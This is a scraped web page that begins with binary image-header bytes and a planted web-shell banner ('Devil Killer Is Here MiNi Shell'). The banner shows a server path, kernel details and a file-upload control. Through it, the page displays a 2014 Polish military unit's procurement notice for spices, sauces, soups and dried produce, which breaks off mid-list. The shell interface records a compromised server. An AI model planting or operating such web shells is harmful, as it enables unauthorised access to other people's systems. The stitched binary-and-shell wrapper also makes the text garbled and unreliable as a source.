JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140909/192283-N-2014.html

<p class="kh_header"><b>Kraków: Dostawa przypraw przetworzonych, sosów, zup, grzybów suszonych i owoców suszonych.</b><br>
<b>Numer ogłoszenia: 192283 - 2014; data zamieszczenia: 09.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.3rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa przypraw przetworzonych, sosów, zup, grzybów suszonych i owoców suszonych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa przypraw przetworzonych, sosów, zup, grzybów suszonych i owoców suszonych.
Przedmiot zamówienia obejmuje 3 grupy produktów tj.: 

GRUPA I - przyprawy przetworzone, sosy, zupy: sos grzybowy, sos myśliwski, sos boloński, barszcz czerwony - instant, żurek, majonez jednoporcjowy, majonez, musztarda jednoporcjowa, musztarda, ketchup jednoporcjowy, ketchup, przyprawa do mięsa, przyprawa do ryb, przyprawa do drobiu, przyprawa uniwersalna, ocet, kwasek cytrynowy, cynamon, bulion drobiowy, rosół wołowy, bazylia, oregano, żelatyna spożywcza, przyprawa do zup w płynie, koncentrat pomidorowy, liść laurowy, majeranek, ziele angielskie, rozmaryn, czosnek, papryka chili, carry, szałwia, koperek suszony, natka pietruszki suszona, kolendra, sos do sałatek, zioła prowansalskie, drożdże, 
GRUPA II - owoce suszone: jabłka suszone, śliwki suszone, morele suszone
GRUPA III - grzyby suszone
3Każda z 3 grup produktów dostarczana będzie do 6 obszarów dostaw, dlatego zakres zamówienia obejmuje 18 zadań.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.30.00-4, 15.32.24.10-1, 15.89.80.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawcę tego warunku dokonana zostanie w oparciu o treść oświadczenia, o którym mowa w art. 22 ust. 1 ustawy Pzp. Zamawiający uzna, że wykonawca spełnia powyższy warunek, jeżeli wraz z ofertą złoży oświadczenie, w którego treści potwierdzi, iż spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawcę tego warunku dokonana zostanie w oparciu o treść oświadczenia, o którym mowa w art. 22 ust. 1 ustawy Pzp. Zamawiający uzna, że wykonawca spełnia powyższy warunek, jeżeli wraz z ofertą złoży oświadczenie, w którego treści potwierdzi, iż spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawcę tego warunku dokonana zostanie w oparciu o treść oświadczenia, o którym mowa w art. 22 ust. 1 ustawy Pzp. Zamawiający uzna, że wykonawca spełnia powyższy warunek, jeżeli wraz z ofertą złoży oświadczenie, w którego treści potwierdzi, iż spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawcę tego warunku dokonana zostanie w oparciu o treść oświadczenia, o którym mowa w art. 22 ust. 1 ustawy Pzp. Zamawiający uzna, że wykonawca spełnia powyższy warunek, jeżeli wraz z ofertą złoży oświadczenie, w którego treści potwierdzi, iż spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania przez wykonawcę tego warunku dokonana zostanie w oparciu o treść oświadczenia, o którym mowa w art. 22 ust. 1 ustawy Pzp. Zamawiający uzna, że wykonawca spełnia powyższy warunek, jeżeli wraz z ofertą złoży oświadczenie, w którego treści potwierdzi, iż spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego wykonawca zobowiązany jest złożyć wraz z ofertą:

1.Decyzję Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu, do wprowadzenia do obrotu produktów pochodzenia niezwierzęcego lub zaświadczenie wydane przez Państwową Inspekcję Sanitarną potwierdzające wpis do rejestru zatwierdzonych zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (wzór zawiera załącznik nr 6 do rozporządzenia Ministra zdrowia z dnia 29 maja 2007r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej)
2. Aktualny, potwierdzony w 2014 roku dokument potwierdzający stosowanie wdrożonego systemu HACCP, tj.:
a) certyfikat HACCP, wystawiony przez niezależną, akredytowaną jednostkę certyfikującą, 
lub 
b) zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP, wydane na podstawie art. 59 i 73 ust.1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia, 
lub
c) protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji sanitarnej, jako organ urzędowej kontroli żywności, w skład którego wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymania systemu HACCP na podstawie art. 59 i 73 ust. 1 ustawy z dnia 26 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony druk OFERTA,
W przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
2. Wypełniony formularz cenowy w zakresie zadań, których realizację wykonawca oferuje.
3. Oryginał lub kopię pełnomocnictwa:
a) dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu z właściwego rejestru). 
b) dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu  albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.

Wszystkie dokumenty wymagane przez zamawiającego muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustaw, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia do umowy zmian. 
Warunki zmiany umowy: 
1) Na pisemny wniosek Zamawiającego dopuszcza się zmiany w ilościach poszczególnych towarów (środków spożywczych) określonych w ilościach zawartych w umowie przy zachowaniu następujących warunków:
a) zmiana wynika z potrzeb odbiorców, których nie można było przewidzieć w chwili zawarcia umowy;
b) zmiana nie powoduje przekroczenia maksymalnej wartości umowy brutto. 
2) W przypadku zmiany wysokości stawki podatku od towarów i usług (VAT),bądź zmiany zakwalifikowania danego produktów zakresie PKWiU, która wpływa na wartość należnego podatku VAT, na pisemny wniosek zainteresowanej strony, dopuszcza się zmianę wartości umowy brutto w stosunku do towarów, których zmiana dotyczy.
3) Dopuszcza się waloryzację cen jednostkowych netto według wskaźnika cen towarów i usług konsumpcyjnych dla żywności i napojów bezalkoholowych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS .Celem waloryzacji jest tylko i wyłącznie urealnienie cen zakupu przedmiotu niniejszej umowy.
4) Waloryzacja jest dopuszczalna w razie łącznego spełnienia następujących warunków:
a) złożenia pisemnego wniosku przez zainteresowaną stronę, przy czym każda ze stron ma prawo do  dwukrotnej waloryzacji na swoją korzyść;
b) upływu pięciu miesięcy od rozpoczęcia realizacji umowy,
c) zmiany wskaźnika przekraczającej 6 punktów procentowych, 
5) Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej z GUS wskaźniki cen towarów i usług konsumpcyjnych - żywność i napoje bezalkoholowe, za miesiąc poprzedzający wpływ wniosku, o którym mowa powyżej, w odniesieniu do cen z grudnia 2014r. , dla odpowiednich grup żywności.
6) Zmiana cen wskutek waloryzacji wymaga formy pisemnej pod rygorem nieważności 
i wywołuje skutek od dnia podpisania stosownego aneksu do umowy, który powinien zostać podpisany w terminie do 30 dni od daty otrzymania przez Zamawiającego stosownej informacji z GUS. W przypadku gdy Wykonawca wraz z wnioskiem do Zamawiającego przedłoży prawidłową informację z GUS, sporządzoną w formie pisemnej, dopuszcza się dokonanie waloryzacji na podstawie takowej informacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.3rblog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228, 30-901 Kraków, ul. Montelupich 3, bud. 28, pok 24- Sekcja Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2014 godzina 10:00, miejsce: Jednostka Wojskowa 4228, 30-901 Kraków, ul. Montelupich 3, bud. 28 - kancelaria jawna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa przypraw przetworzonych, sosów, zup do obszaru I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przypraw przetworzonych, sosów, zup tj: 
1	Barszcz czerwony - 80 kg
2	Żurek	250 kg
3	Majonez jednoporcjowy	800 kg
4	Majonez 100 kg
5	Musztarda jednoporcjowa 1 200 kg
6	Musztarda	200 kg
7	Ketchup jednoporcjowy	800 kg
8	Ketchup 100 kg
9	Przyprawa do mięsa 150 kg
10	Przyprawa do ryb	kg 60 kg
11	Przyprawa do drobiu 60 kg
12	Przyprawa uniwersalna	300 kg
13	Ocet	400 l
14	Kwasek cytrynowy 40 kg
15	Cynamon 20 kg
16	Bulion drobiowy 60 kg
17	Rosół wołowy 60 kg
18	Bazylia 24 kg
19	Oregano 24 kg
20	Żelatyna spożywcza 10 kg
21	Przyprawa do zup w płynie	450 kg
22	Koncentrat pomidorowy	800 kg
23	Liśc laurowy 20 kg
24	Majeranek	40 kg
25	Ziele angielskie 40 kg
26	Rozmarym	15 kg
27	Czosnek 10 kg
28	Papryka chili 24 kg
29	Carry	15 kg
30	Szałwia 5 kg
31	Koperek suszony	5 kg
32	Natka pietruszki suszona 5 kg
33	Kolendra  5 kg
34	Sos do sałatek 5 kg
35	Zioła prowansalskie 10 kg
36	Drożdże 20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa przypraw przetworzonych, sosów, zup do obszaru II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przypraw przetworzonych, sosów, zup tj: 
1	Barszcz czerwony - 100 kg
2	Żurek	300 kg
3	Majonez jednoporcjowy	372 kg
4	Majonez 240 kg
5	Musztarda jednoporcjowa 280 kg
6	Musztarda	140 kg
7	Ketchup jednoporcjowy	160 kg
8	Ketchup 80 kg
9	Przyprawa do mięsa 92 kg
10	Przyprawa do ryb	20 kg
11	Przyprawa do drobiu	60 kg
12	Przyprawa uniwersalna	680 kg
13	Ocet	60 l
14	Kwasek cytrynowy 4 kg
15	Cynamon	1 kg
16	Rosół wołowy 100 kg
17	Bazylia 12 kg
18	Oregano	6 kg
19	Żelatyna spożywcza	2 kg,
20	Przyprawa do zup w płynie	500 kg, 
21	Koncentrat pomidorowy	520 kg,
22	Liśc laurowy 8 kg, 
23	Majeranek	36 kg, 
24	Ziele angielskie 48 kg, 
25	Rozmarym	1 kg, 
26	Czosnek	1 kg, 
27	Papryka chili 2 kg, 
28	Carry	2 kg, 
29	Szałwia 1 kg, 
30	Koperek suszony	4 kg, 
31	Natka pietruszki suszona 4 kg, 
32	Kolendra 1 kg, 
33	Sos do sałatek 1 kg, 
34	Zioła prowansalskie 1 kg, 
35	Drożdże 1kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa przypraw przetworzonych, sosów zup do obszaru III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przypraw przetworzonych, sosów zup, tj: 
1	Sos grzybowy 21kg, 
2	Sos myśliwski 21 kg, 
3	Sos boloński 21 kg, 
4	Barszcz czerwony - instant 52 kg, 
5	Żurek	32 kg, 
6	Majonez jednoporcjowy	360 kg, 
7	Majonez 100 kg, 
8	Musztarda jednoporcjowa 590 kg, 
9	Musztarda 50 kg, 
10	Ketchup jednoporcjowy	590 kg, 
11	Ketchup 50 kg, 
12	Przyprawa do mięsa 75 kg, 
13	Przyprawa do ryb	47 kg, 
14	Przyprawa do drobiu 62 kg, 
15	Przyprawa uniwersalna	88 kg, 
16	Ocet	170 l, 
17	Kwasek cytrynowy 33 kg, 
18	Cynamon 2 kg, 
19	Bulion drobiowy 160 kg, 
20	Rosół wołowy 120 kg, 
21	Bazylia 27 kg, 
22	Oregano 27 kg, 
23	Przyprawa do zup w płynie 420 kg, 
24	Koncentrat pomidorowy	kg	400 kg, 
25	Liśc laurowy 35 kg, 
26	Majeranek	43 kg, 
27	Ziele angielskie	41 kg, 
28	Rozmarym	4 kg, 
29	Czosnek	8 kg, 
30	Papryka chili 8 kg, 
31	Carry 4 kg, 
32	Koperek suszony	2 kg, 
33	Natka pietruszki suszona	2 kg, 
34	Kolendra 1kg, 
35	Sos do sałatek 5 kg, 
36	Zioła prowansalskie 16 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.87.12.70-7, 15.87.11.20-1, 15.89.00.00-3, 15.89.15.00-5, 15.87.00.00-7, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa przypraw przetworzonych, sosów zup do obszaru IV..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przypraw przetworzonych, sosów zup tj:
1	Sos grzybowy 275 kg, 
2	Sos myśliwski 270 kg, 
3	Sos boloński 80 kg, 
4	Barszcz czerwony - instant 460 kg, 
5	Żurek	800 kg, 
6	Majonez jednoporcjowy	900 kg, 
7	Majonez 390 kg, 
8	Musztarda jednoporcjowa 950 kg, 
9	Musztarda	60 kg, 
10	Ketchup jednoporcjowy	1 000 kg, 
11	Ketchup 100 kg, 
12	Przyprawa do mięsa 115 kg, 
13	Przyprawa do ryb	80 kg, 
14	Przyprawa do drobiu 80 kg, 
15	Przyprawa uniwersalna	360 kg, 
16	Ocet	285 l,
17	Kwasek cytrynowy 130 kg, 
18	Cynamon 20 kg, 
19	Bulion drobiowy 280 kg, 
20	Rosół wołowy 400 kg, 
21	Bazylia 10 kg, 
22	Oregano 10 kg, 
23	Przyprawa do zup w płynie 1 000 kg, 
24	Koncentrat pomidorowy	2 200 kg, 
25	Liśc laurowy 12 kg, 
26	Majeranek	26 kg, 
27	Ziele angielskie	18 kg, 
28	Rozmarym	2 kg, 
29	Czosnek 12 kg, 
30	Papryka chili 2 kg, 
31	Carry 2 kg, 
